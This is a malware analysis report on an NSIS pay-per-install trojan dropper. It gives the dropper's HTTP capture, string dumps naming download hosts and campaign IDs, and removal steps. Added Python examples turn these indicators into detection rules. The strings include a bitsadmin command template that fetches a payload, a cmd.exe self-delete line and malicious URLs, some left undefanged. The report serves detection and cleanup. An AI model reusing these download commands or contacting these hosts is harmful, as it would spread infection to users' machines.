GET /?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.wenter3.space
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 350208
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Thu, 12 May 2016 21:58:13 GMT
X-Cache: Miss from cloudfront
Via: 1.1 b4ee4db849dcb5fce83f0bc3d6a9d57f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xeMckmYpslwK8ecETGD0QgaHiG7WYlLxCn0xbPK12tbiuJInRXcPeQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........g..}4..}4

<<< skipped >>>
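The exchange with get.wenter3.space is the one that matters in the capture above: the request comes from the NSIS download plugin (User-Agent "NSISDL/1.2 (Mozilla)", never sent by a browser), the query string carries affiliate accounting (affId, s1, s2, setupName, instId), and the server answers with an attachment named cpSetup.exe whose body starts with an MZ header. The checks below turn those three observations into triage logic over raw request/response pairs. This is an added example, not code from the Lavasoft report; SAMPLE_EXE is built from the captured headers with a constructed first few body bytes, and SAMPLE_GIF from the cancel1.gif fetch, so that the rules can be seen firing on one and staying quiet on the other.

```python
"""Flag a captured HTTP exchange that looks like a pay-per-install download.

Added example, not code from the Lavasoft report. SAMPLE_EXE reproduces the
get.wenter3.space headers shown in the Network Activity dump with a constructed
body; SAMPLE_GIF reproduces the cdn2.downloadcrest.com cancel1.gif fetch.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Query keys that carry affiliate / campaign accounting in the captured requests.
AFFILIATE_PARAMS = {"affid", "s1", "s2", "setupname", "instid", "appversion", "pid", "tid", "ci"}
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".msi")

SAMPLE_EXE = (
    b"GET /?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup"
    b"&appVersion=2.92&instId=11 HTTP/1.0\r\n"
    b"Host: get.wenter3.space\r\n"
    b"User-Agent: NSISDL/1.2 (Mozilla)\r\n"
    b"Accept: */*\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 350208\r\n"
    b"Content-disposition: attachment; filename=\"cpSetup.exe\"\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00"  # constructed DOS-header start, not the real cpSetup.exe bytes
)

SAMPLE_GIF = (
    b"GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1\r\n"
    b"Host: cdn2.downloadcrest.com\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/gif\r\n"
    b"Content-Disposition: attachment; filename=\"cancel1.gif\"\r\n"
    b"\r\n"
    b"GIF89a\x01\x00\x01\x00"  # constructed GIF header
)


def _headers(lines):
    """Lower-cased header name -> value for the header lines of one message."""
    out = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            out[name.strip().lower()] = value.strip()
    return out


def parse_http_pair(blob):
    """Split 'request head / response head / body'.

    Only body-less requests (GET) are handled, which is all the capture shows.
    Returns (request_line, request_headers, status_line, response_headers, body).
    """
    req_raw, _, rest = blob.partition(b"\r\n\r\n")
    resp_raw, _, body = rest.partition(b"\r\n\r\n")
    req = req_raw.decode("latin-1").split("\r\n")
    resp = resp_raw.decode("latin-1").split("\r\n")
    return req[0], _headers(req[1:]), resp[0], _headers(resp[1:]), body


def triage(blob):
    """Return the indicators that fire on one exchange, in a fixed order."""
    req_line, req_h, _status, resp_h, body = parse_http_pair(blob)
    findings = []
    _method, target, _version = req_line.split(" ", 2)

    # 1. The NSIS download plugin announces itself; browsers never send this UA.
    if req_h.get("user-agent", "").startswith("NSISDL/"):
        findings.append("nsisdl-user-agent")

    # 2. Affiliate accounting in the query string (who is paid for this install).
    hit = sorted({k.lower() for k in parse_qs(urlsplit(target).query)} & AFFILIATE_PARAMS)
    if hit:
        findings.append("affiliate-params:" + ",".join(hit))

    # 3. The server pushes an executable as an attachment.
    m = re.search(r'filename="?([^";]+)', resp_h.get("content-disposition", ""))
    fname = m.group(1).strip().lower() if m else ""
    if fname.endswith(EXECUTABLE_EXT):
        findings.append("executable-attachment:" + fname)

    # 4. The body is a PE whatever the headers claim; a PE under image/* is worse.
    ctype = resp_h.get("content-type", "").split(";")[0].strip().lower()
    if body.startswith(b"MZ"):
        findings.append("mz-body" if ctype == "application/octet-stream" else "mz-body-mislabelled:" + ctype)
    return findings


if __name__ == "__main__":
    print("cpSetup.exe fetch:", triage(SAMPLE_EXE))
    print("cancel1.gif fetch:", triage(SAMPLE_GIF))
```

Run on a proxy or IDS log, the fourth rule is the one to keep even if the others are tuned out: the MZ check does not depend on a user agent or a file name that the next build of the downloader can change.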

The Trojan connects to the servers at the following location(s):

%original file name%.exe_1764:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"
1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
.vN {
({,{<{*;
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\cpSetup.exe
Setup__2140_il65.exe
SETUP_~1.EXE
.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ii_start.txt
ersion=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
up__2140_il65.exe
ps.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp
hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hXXp://pe-ma3i.info/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
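The strings dumped from the NSIS installer above hold the campaign's network indicators in defanged form (hXXp://, VVV.), and the dosecuretrips.com download URL embeds a second, unencoded URL in its appsetupurl parameter, which in turn carries a third one. The extractor below refangs the strings, pulls every URL including the nested ones, and collects the campaign identifiers from the query strings. This is an added example and not part of the report; SAMPLE_STRINGS is copied from the dump above, and the list of campaign keys is an assumption based on the parameters visible on this page.

```python
"""Pull network indicators out of a strings dump like the one above.

Added example, not code from the Lavasoft report. SAMPLE_STRINGS is copied
from the dump on this page; the report defangs URLs as hXXp:// and VVV., which
refang() reverses before parsing.
"""
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_STRINGS = [
    "hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140"
    "&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer"
    "&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png",
    "hXXp://pe-ma3i.info/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7",
    "hXXp://nsis.sf.net/NSIS_Error",
    "User-Agent: NSISDL/1.2 (Mozilla)",
    r'C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\cpSetup.exe',
]

# Query keys that identify the campaign / affiliate (assumption: taken from the
# parameters visible in this report, not a documented scheme).
CAMPAIGN_KEYS = ("ci", "pid", "tid", "sid", "version", "p")

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def refang(text):
    """Undo the report's defanging so standard URL parsing works."""
    return (text.replace("hXXps://", "https://")
                .replace("hXXp://", "http://")
                .replace("VVV.", "www."))


def walk_urls(url, found=None):
    """Collect url plus any URL nested unencoded in its query values.

    parse_qsl splits on '&' only, so the nested URL's own parameters spill into
    the outer list; that is what the sample actually looks like on the wire.
    """
    found = [] if found is None else found
    found.append(url)
    for _key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if URL_RE.match(value):
            walk_urls(value, found)
    return found


def extract_indicators(lines):
    """Return {'urls': [...], 'hosts': [...], 'campaign': {...}} for a strings dump."""
    urls, hosts, campaign = [], set(), {}
    for line in lines:
        for top in URL_RE.findall(refang(line)):
            for url in walk_urls(top):
                urls.append(url)
                hosts.add(urlsplit(url).hostname)
                for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
                    if key in CAMPAIGN_KEYS:
                        campaign.setdefault(key, value)  # first occurrence wins
    return {"urls": urls, "hosts": sorted(hosts), "campaign": campaign}


if __name__ == "__main__":
    result = extract_indicators(SAMPLE_STRINGS)
    for url in result["urls"]:
        print(url)
    print(result["hosts"])
    print(result["campaign"])
```

Two things to do with the output. First, drop nsis.sf.net before anything goes on a block list: the NSIS_Error URL is baked into every NSIS installer, malicious or not. Second, note that pid=145 and tid=438526 from the launch_v2.php string are the same values sent as s1=145 and s2=438526 in the cpSetup.exe request captured in the Network Activity dump, so the two domains belong to one affiliate chain and can be pivoted on together.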

Setup__2140_il65.exe_1408:

.text
`.rdata
@.data
.rsrc
@.reloc
FTPQ
j.Yf;
_tcPVj@
.PjRW
1.2.8
inflate 1.2.8 Copyright 1995-2013 Mark Adler
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
115 115 15 26 124 30 115 85
113 127 13 27 75 23 88 101 6
112 82 42 76 58 85 83 122 15
112 95 37
112 115 23 59 75
112 115 23 47 97 3 82 122
123 121 2 27 65 24 88 120 34
123 121 2 27 65 24 88 120 52
89 98 7 19 100 85 83 122 15
89 101 15 16 103 16 66 102
88 122 6 76 58 85 83 122 15
101 115 2 27 78 18 91 115
101 115 15 26 105 8 82 82 32
68 100 21
96 100 10 11 109 61 94 122 6
64 100 8 12 124
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÁ
.sYPELN
.Hfs-
%\sA.br
sG%F`l
k.gJw
H%UtC
pz.rSDz
#.mlz
j%u5Q
dO~.gnM
.Ng)Gy:o
PX'.RS>
A!N%d)
YSshqh
2.PAP
al0f
%fTeN
7*1%x
XG.bK
.Ap 6
.uE=z)
y%xv/
?b.hUuF3
.SRR*
%UT o
.PdbRH
9604604
hFAÒJ
.wrCc
TV%%Ux
4..Sp
J[%Um
.Vj3b
>.QXlQ
^P.em
.pfm(
}V%%U
^kG%D
HHB.HHB.
<assemblyIdentity type="win32" processorArchitecture="*" version="3.0.15.2" name="Name"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
1-2
6l6P6A<v<
11F1X1d1q1
1 141:1\1
2'252?2[2`2
> ?7?@?|?
8&9-949@9
9(9,989@9\9|9
Cmscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
ADVAPI32.DLL
USER32.DLL
portuguese-brazilian
109 90 121
103 67 12
122 93 120
126 74 111 105 70 68 104
16 103 70 92 111 97 67 113
126 106 79 73 70 100 72
125 82 105 105
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe
3.21.12.38
bor.exe

Setup__2140_il65.exe_1408_rwx_02480000_000B3000:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
t/lURlhE7oHSekJAUfGI1XZRfHbqjOY=
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
sNRhTgJj9pbUckcMdOyB0GdGSDe7gLs=
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
t/lURlhH/5DZVVFDeteg/XpQWEA=
q8F2TXxl8YfUYFAARuuBw2plWXvytMN8QElk7a3cckRJWf J1EQPb2X7hcV2d0N48ozUf1MfJc2K0GNQRHjqyOFhTE9y7ZeCIW1Jb qznUNRQ3T7l8IgEWp 7JfFRA9veO6d93pPSUCyoNR/Rlhy2I3ddnQAWvGS1FVKQHLJyPJhRk1j 7DZYUZNc7Kj1Gd1SWXtjd59ZlRAsrfUZ2ZCYfeW3n1OSXnqstBhSk118oHmP2RJY8qB3GNzTWP2s51ESkhy3YzQYXdDWuuIxXphVWP7yPZ2V2F4 pHddmVFe/uq0H5GezvZgcVGUEll2oHXclZAY8ut/XJNS2L/g9Q/YF5y/5DUV0pecv2Q3mFaezvZgcVVSkBy35DFYUpOYuqBwkQPf3Lqoth/Rm1j6pbYcVZYcu2znURCRWPYi8NeVkBj95TddmxOffuHxWAPb3vxl9RbQkJz8oGdUFFJduqB9GVGQmPJyOJ2V2lh 4rFP3FJZPuQ9GVGQmOys9B6V2p47LfYfURActGG23ZAWDvMgd12Ql9y05HFdlsAWO6B30NRQ3T7l8I/YF5y/5DUXlZYcuaznVRGWEP7icFVSkBy0IXcdnQAUPKL03JPamX7gZ1URlhb/5fFVlFeeOzI9nZXaW/3kPJ8R0lH7IvSdlBfO9GRxWNWWFP7hsR0cFhl94rWUg9pb 6F33dmQmH3lt59Tkl56rfFYUpCcO2znVBRSXbqgfd6T0lA
%c%c%c%c
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
carpel.groveled.1 = s 'Inst Class'
CLSID = s '{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}'
carpel.groveled = s 'Inst Class'
CurVer = s 'carpel.groveled.1'
ForceRemove {320195d8-a8c1-4b82-b50e-6e2fe7b25b99} = s 'Inst Class'
ProgID = s 'carpel.groveled.1'
VersionIndependentProgID = s 'carpel.groveled'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Thu May 12 17:02:02 2016
7%8x8
8%8S8r8x8
1 2$2(2,2
<#<(<3<9<
3$3(3,3034383<3@3
4(4/44484<4]4
4&5,5054585
00f0v0
0
0|0
1 1$1(1,1014181<1
004080<0
4 4@4`4|4
: :<:@:`:
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
:?*\"'/.
dream.capture
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
%d.%d.%d.%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
%%X
version.dll
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
secularistsarakolet.site
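The strings from the injected region above describe the bootstrapper's host behaviour well enough to write detection for it: it looks for bitsadmin.exe in two locations (including the XP Support Tools folder) and runs "bitsadmin /transfer amijob /download /priority high" with a URL and a destination, it writes %TEMP%\task.vbs, and it removes files with cmd.exe "/c del". Each of these is a child process of a binary living in the user's Temp folder, which is what the rules below key on. This is an added example, not part of the report; the SAMPLE_EVENTS are constructed Sysmon-style process-creation records, and the profile name, the download URL argument and the amiXExd.exe destination name are assumptions (the strings give only the %s templates).

```python
r"""Process-creation rules for the behaviour the bootstrapper strings describe.

Added example, not code from the Lavasoft report. Rules are derived from the
strings 'bitsadmin /transfer amijob /download /priority high %s %s',
'/c del "%s"' with 'cmd.exe', and '%TEMP%\task.vbs'. SAMPLE_EVENTS are
constructed; 'alice', the URL argument and 'amiXExd.exe' are assumptions.
"""
import re

# Folder fragments that mark a path as a user or system Temp location (lower-case).
TEMP_MARKERS = ("\\local settings\\temp\\", "\\locals~1\\temp\\",
                "\\appdata\\local\\temp\\", "\\windows\\temp\\")
BITS_RE = re.compile(r"/transfer\s+(\S+).*?/download\b", re.I)
DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.I)

PARENT = r"C:\Documents and Settings\alice\Local Settings\Temp\Setup__2140_il65.exe"
SAMPLE_EVENTS = [
    {"parent_image": PARENT, "image": r"C:\WINDOWS\system32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer amijob /download /priority high "
                     r"http://pe-sixi.com/downloadS.php?bu=am C:\DOCUME~1\alice\LOCALS~1\Temp\amiXExd.exe"},
    {"parent_image": PARENT, "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": r'cmd.exe /c del "C:\DOCUME~1\alice\LOCALS~1\Temp\Setup__2140_il65.exe"'},
    {"parent_image": PARENT, "image": r"C:\WINDOWS\system32\wscript.exe",
     "command_line": r'wscript.exe "C:\DOCUME~1\alice\LOCALS~1\Temp\task.vbs"'},
    # Benign look-alikes that must not fire.
    {"parent_image": r"C:\WINDOWS\explorer.exe", "image": r"C:\WINDOWS\system32\bitsadmin.exe",
     "command_line": "bitsadmin /list /allusers"},
    {"parent_image": r"C:\WINDOWS\explorer.exe", "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": r'cmd.exe /c del "C:\Users\alice\Documents\old.txt"'},
]


def in_temp(path):
    """True if the path (or command line) references a Temp folder."""
    p = path.lower()
    return any(marker in p for marker in TEMP_MARKERS)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), ev["parent_image"], ev["command_line"]
        if image == "bitsadmin.exe":
            # A binary running out of Temp driving BITS to fetch another payload.
            m = BITS_RE.search(cmd)
            if m and in_temp(parent):
                alerts.append(("bitsadmin-download-from-temp-parent", m.group(1)))
        elif image == "cmd.exe":
            # '/c del "%s"' from a Temp-resident parent: cleanup or self-deletion.
            # Compared by folder, not name, so 8.3 (SETUP_~1.EXE) and long names both match.
            m = DEL_RE.search(cmd)
            if m and in_temp(m.group(1)) and in_temp(parent):
                alerts.append(("temp-binary-deletes-temp-file", m.group(1)))
        elif image in ("wscript.exe", "cscript.exe"):
            # Script host launched on a .vbs dropped into Temp (%TEMP%\task.vbs).
            if in_temp(cmd) and cmd.lower().rstrip('"').endswith(".vbs"):
                alerts.append(("script-host-runs-temp-vbs", cmd))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(rule, "->", detail)
```

The job name "amijob" is a free identifier for this family and worth an exact-match rule of its own; the three rules above are written on parent location rather than on that string so they survive a rename. Legitimate software does run bitsadmin from Temp during setup, so the first rule is a candidate for an allow list keyed on the signer of the parent rather than for suppression.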


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager). The process IDs below are from the analysis run and will differ on an infected host; match on the image name and its location in the user's Temp folder instead:

    %original file name%.exe:1764
    cpSetup.exe:260

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
    %Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
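The file list in step 3 is written for the profile that ran the sample, in the Windows XP layout used by the analysis machine. On a host with several profiles, or on Vista and later where Local Settings\Temp became AppData\Local\Temp, each entry has to be expanded per user and per layout before it can be checked. The sweep below does that for the Temp and Desktop entries. This is an added example, not part of the report: the existence check is injected so it runs offline against FAKE_FS, a constructed file set, and the profile names are assumptions. The Temporary Internet Files entries are deliberately left out: the Content.IE5 subfolder names (OPQNSD2J, 4DQJW9YN and so on) are generated per machine and will not match elsewhere, so the cache is cleared as a whole in step 4 rather than file by file.

```python
r"""Sweep user profiles for the files the manual removal steps list.

Added example, not code from the Lavasoft report. expand() rewrites one report
entry for a named profile in the XP layout or the Vista-and-later layout;
sweep() checks every entry for every user with an injectable exists() so it can
be tested against FAKE_FS (constructed) and run for real with os.path.exists.
"""
import os

# Temp and Desktop entries from step 3 above, in the report's own notation.
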